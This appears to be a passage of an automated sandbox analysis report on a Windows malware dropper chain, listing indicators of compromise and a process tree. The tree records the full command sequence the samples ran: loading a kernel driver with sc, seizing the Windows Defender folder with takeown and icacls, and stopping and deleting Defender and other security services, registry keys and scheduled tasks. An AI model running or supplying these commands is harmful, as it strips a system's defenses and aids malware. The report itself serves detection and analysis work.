Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
3880	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 47 IoCs

pid	Process
5952	taskkill.exe
6484	taskkill.exe
2408	taskkill.exe
7576	taskkill.exe
7188	taskkill.exe
7536	taskkill.exe
6884	taskkill.exe
6224	taskkill.exe
7016	taskkill.exe
7192	taskkill.exe
8420	taskkill.exe
3492	taskkill.exe
4944	taskkill.exe
316	taskkill.exe
4924	taskkill.exe
6528	taskkill.exe
6764	taskkill.exe
6876	taskkill.exe
7256	taskkill.exe
7608	taskkill.exe
1576	taskkill.exe
6240	taskkill.exe
6532	taskkill.exe
6820	taskkill.exe
7364	taskkill.exe
7776	taskkill.exe
4376	taskkill.exe
924	taskkill.exe
2648	taskkill.exe
6828	taskkill.exe
7468	taskkill.exe
7476	taskkill.exe
4444	taskkill.exe
6552	taskkill.exe
8652	taskkill.exe
2068	taskkill.exe
4436	taskkill.exe
4444	taskkill.exe
6136	taskkill.exe
4824	taskkill.exe
6536	taskkill.exe
740	taskkill.exe
1564	taskkill.exe
3620	taskkill.exe
7172	taskkill.exe
4856	taskkill.exe
1492	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880590172448803"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{A4F0B679-BD4D-4515-B9D3-00A871683422}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{CF1E7184-6267-4124-8FD2-CEB9147AC438}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3539616762.txt\	cmd.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5680	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2352	1Q30C9.exe
2352	1Q30C9.exe
5056	rapes.exe
5056	rapes.exe
2036	2y1617.exe
2036	2y1617.exe
2036	2y1617.exe
2036	2y1617.exe
2036	2y1617.exe
2036	2y1617.exe
2924	rapes.exe
2924	rapes.exe
1164	23da5e6bb9.exe
1164	23da5e6bb9.exe
1164	23da5e6bb9.exe
1164	23da5e6bb9.exe
1164	23da5e6bb9.exe
1164	23da5e6bb9.exe
4464	ad3a6208a1.exe
4464	ad3a6208a1.exe
1700	29043e627c.exe
1700	29043e627c.exe
1056	d0249e62d5.exe
1056	d0249e62d5.exe
1056	d0249e62d5.exe
1056	d0249e62d5.exe
1056	d0249e62d5.exe
1056	d0249e62d5.exe
5852	2039335369.exe
5852	2039335369.exe
1724	4760908696.exe
1724	4760908696.exe
2332	9220b9dffd.exe
2332	9220b9dffd.exe
1724	4760908696.exe
1724	4760908696.exe
2332	9220b9dffd.exe
2332	9220b9dffd.exe
2332	9220b9dffd.exe
5368	MSBuild.exe
5368	MSBuild.exe
5368	MSBuild.exe
5368	MSBuild.exe
5008	rapes.exe
5008	rapes.exe
5200	3514bb24fc.exe
5200	3514bb24fc.exe
5200	3514bb24fc.exe
5200	3514bb24fc.exe
6576	91c4598add.exe
6576	91c4598add.exe
6820	MSBuild.exe
6820	MSBuild.exe
6820	MSBuild.exe
6820	MSBuild.exe
5560	MSBuild.exe
5560	MSBuild.exe
5560	MSBuild.exe
5560	MSBuild.exe
4836	Passwords.com
4836	Passwords.com
4836	Passwords.com
4836	Passwords.com
4836	Passwords.com

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
656	Process not Found
656	Process not Found
2516	tzutil.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4576	p3hx1_003.exe
4576	p3hx1_003.exe
4576	p3hx1_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	4436	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	4412	firefox.exe
Token: SeDebugPrivilege	4412	firefox.exe
Token: SeDebugPrivilege	2332	9220b9dffd.exe
Token: SeDebugPrivilege	7900	tasklist.exe
Token: SeDebugPrivilege	6028	tasklist.exe
Token: SeDebugPrivilege	3480	tasklist.exe
Token: SeDebugPrivilege	4404	tasklist.exe
Token: SeDebugPrivilege	6188	tasklist.exe
Token: SeDebugPrivilege	5840	tasklist.exe
Token: SeDebugPrivilege	2412	tasklist.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	6452	tasklist.exe
Token: SeDebugPrivilege	6760	tasklist.exe
Token: SeDebugPrivilege	6872	powershell.exe
Token: SeIncreaseQuotaPrivilege	6872	powershell.exe
Token: SeSecurityPrivilege	6872	powershell.exe
Token: SeTakeOwnershipPrivilege	6872	powershell.exe
Token: SeLoadDriverPrivilege	6872	powershell.exe
Token: SeSystemProfilePrivilege	6872	powershell.exe
Token: SeSystemtimePrivilege	6872	powershell.exe
Token: SeProfSingleProcessPrivilege	6872	powershell.exe
Token: SeIncBasePriorityPrivilege	6872	powershell.exe
Token: SeCreatePagefilePrivilege	6872	powershell.exe
Token: SeBackupPrivilege	6872	powershell.exe
Token: SeRestorePrivilege	6872	powershell.exe
Token: SeShutdownPrivilege	6872	powershell.exe
Token: SeDebugPrivilege	6872	powershell.exe
Token: SeSystemEnvironmentPrivilege	6872	powershell.exe
Token: SeRemoteShutdownPrivilege	6872	powershell.exe
Token: SeUndockPrivilege	6872	powershell.exe
Token: SeManageVolumePrivilege	6872	powershell.exe
Token: 33	6872	powershell.exe
Token: 34	6872	powershell.exe
Token: 35	6872	powershell.exe
Token: 36	6872	powershell.exe
Token: SeDebugPrivilege	6992	tasklist.exe
Token: SeDebugPrivilege	7144	powershell.exe
Token: SeDebugPrivilege	7192	tasklist.exe
Token: SeDebugPrivilege	7524	tasklist.exe
Token: SeDebugPrivilege	7576	tasklist.exe
Token: SeDebugPrivilege	7608	taskkill.exe
Token: SeDebugPrivilege	4944	taskkill.exe
Token: SeDebugPrivilege	6136	taskkill.exe
Token: SeDebugPrivilege	5952	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	6892	tasklist.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	3604	tasklist.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	4800	tasklist.exe
Token: SeDebugPrivilege	4924	taskkill.exe
Token: SeDebugPrivilege	6224	taskkill.exe
Token: SeDebugPrivilege	6220	tasklist.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	6240	taskkill.exe
Token: SeDebugPrivilege	3812	tasklist.exe
Token: SeDebugPrivilege	6484	taskkill.exe
Token: SeDebugPrivilege	6536	taskkill.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
1724	4760908696.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
1724	4760908696.exe
4412	firefox.exe
1724	4760908696.exe
1724	4760908696.exe
4836	Passwords.com
4836	Passwords.com
4836	Passwords.com
2820	chrome.exe
7212	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
1724	4760908696.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
4412	firefox.exe
1724	4760908696.exe
1724	4760908696.exe
1724	4760908696.exe
4836	Passwords.com
4836	Passwords.com
4836	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4412	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5668 wrote to memory of 1748	5668	file.exe	89
PID 5668 wrote to memory of 1748	5668	file.exe	89
PID 5668 wrote to memory of 1748	5668	file.exe	89
PID 2112 wrote to memory of 5876	2112	cmd.exe	91
PID 2112 wrote to memory of 5876	2112	cmd.exe	91
PID 1748 wrote to memory of 2352	1748	G4l05.exe	92
PID 1748 wrote to memory of 2352	1748	G4l05.exe	92
PID 1748 wrote to memory of 2352	1748	G4l05.exe	92
PID 1508 wrote to memory of 5700	1508	cmd.exe	94
PID 1508 wrote to memory of 5700	1508	cmd.exe	94
PID 2352 wrote to memory of 5056	2352	1Q30C9.exe	98
PID 2352 wrote to memory of 5056	2352	1Q30C9.exe	98
PID 2352 wrote to memory of 5056	2352	1Q30C9.exe	98
PID 1748 wrote to memory of 2036	1748	G4l05.exe	99
PID 1748 wrote to memory of 2036	1748	G4l05.exe	99
PID 1748 wrote to memory of 2036	1748	G4l05.exe	99
PID 5056 wrote to memory of 5472	5056	rapes.exe	106
PID 5056 wrote to memory of 5472	5056	rapes.exe	106
PID 5056 wrote to memory of 5472	5056	rapes.exe	106
PID 5472 wrote to memory of 1808	5472	apple.exe	107
PID 5472 wrote to memory of 1808	5472	apple.exe	107
PID 5472 wrote to memory of 1808	5472	apple.exe	107
PID 1808 wrote to memory of 2216	1808	261.exe	109
PID 1808 wrote to memory of 2216	1808	261.exe	109
PID 2216 wrote to memory of 1912	2216	cmd.exe	111
PID 2216 wrote to memory of 1912	2216	cmd.exe	111
PID 2216 wrote to memory of 1912	2216	cmd.exe	111
PID 1912 wrote to memory of 4844	1912	261.exe	112
PID 1912 wrote to memory of 4844	1912	261.exe	112
PID 4844 wrote to memory of 3904	4844	cmd.exe	114
PID 4844 wrote to memory of 3904	4844	cmd.exe	114
PID 4844 wrote to memory of 3896	4844	cmd.exe	115
PID 4844 wrote to memory of 3896	4844	cmd.exe	115
PID 4844 wrote to memory of 3880	4844	cmd.exe	116
PID 4844 wrote to memory of 3880	4844	cmd.exe	116
PID 4844 wrote to memory of 5804	4844	cmd.exe	117
PID 4844 wrote to memory of 5804	4844	cmd.exe	117
PID 4844 wrote to memory of 1452	4844	cmd.exe	118
PID 4844 wrote to memory of 1452	4844	cmd.exe	118
PID 4844 wrote to memory of 3132	4844	cmd.exe	119
PID 4844 wrote to memory of 3132	4844	cmd.exe	119
PID 4844 wrote to memory of 5724	4844	cmd.exe	120
PID 4844 wrote to memory of 5724	4844	cmd.exe	120
PID 4844 wrote to memory of 1172	4844	cmd.exe	121
PID 4844 wrote to memory of 1172	4844	cmd.exe	121
PID 4844 wrote to memory of 664	4844	cmd.exe	122
PID 4844 wrote to memory of 664	4844	cmd.exe	122
PID 4844 wrote to memory of 4824	4844	cmd.exe	123
PID 4844 wrote to memory of 4824	4844	cmd.exe	123
PID 4844 wrote to memory of 6072	4844	cmd.exe	124
PID 4844 wrote to memory of 6072	4844	cmd.exe	124
PID 4844 wrote to memory of 396	4844	cmd.exe	125
PID 4844 wrote to memory of 396	4844	cmd.exe	125
PID 4844 wrote to memory of 3356	4844	cmd.exe	126
PID 4844 wrote to memory of 3356	4844	cmd.exe	126
PID 4844 wrote to memory of 5960	4844	cmd.exe	127
PID 4844 wrote to memory of 5960	4844	cmd.exe	127
PID 4844 wrote to memory of 5088	4844	cmd.exe	128
PID 4844 wrote to memory of 5088	4844	cmd.exe	128
PID 4844 wrote to memory of 1932	4844	cmd.exe	129
PID 4844 wrote to memory of 1932	4844	cmd.exe	129
PID 4844 wrote to memory of 5192	4844	cmd.exe	131
PID 4844 wrote to memory of 5192	4844	cmd.exe	131
PID 4844 wrote to memory of 2780	4844	cmd.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2640
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1808

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5668
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5056
    - - C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5472
      - C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\735B.tmp\735C.tmp\735D.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7465.tmp\7466.tmp\7467.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4844
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:3904
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:3896
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:3880
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:5804
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:1452
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5724
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:1172
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:664
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:4824
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:6072
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:396
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:3356
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:5960
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:1932
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:5192
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:2780
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:1228
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:5464
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:3628
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:2132
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:3496
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:1576
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:4800
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:4828
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:2676
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:4908
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:2416
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:2380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:4916
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:2540
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:1960
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:5740
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:5228
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:6112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:5760
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:1236
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:5200
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:2592
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:2584
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:4280
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:4288
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:4284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:1900
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:4208
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:5532
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:3760
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:6084
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:1768
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:544
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:2112
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:3304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:1056
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:5176
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:1976
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:3976
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:5692
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:3068
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:2332
    - - C:\Users\Admin\AppData\Local\Temp\10416940101\23da5e6bb9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416940101\23da5e6bb9.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1164
    - - C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"
        5⤵
        Executes dropped EXE
        
        PID:4124
    - - C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4464
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5028
    - - C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1700
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1632
    - - C:\Users\Admin\AppData\Local\Temp\10416990101\d0249e62d5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416990101\d0249e62d5.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\10417000101\2039335369.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417000101\2039335369.exe"
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5852
    - - C:\Users\Admin\AppData\Local\Temp\10417010101\4760908696.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417010101\4760908696.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1724
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:924
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4436
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
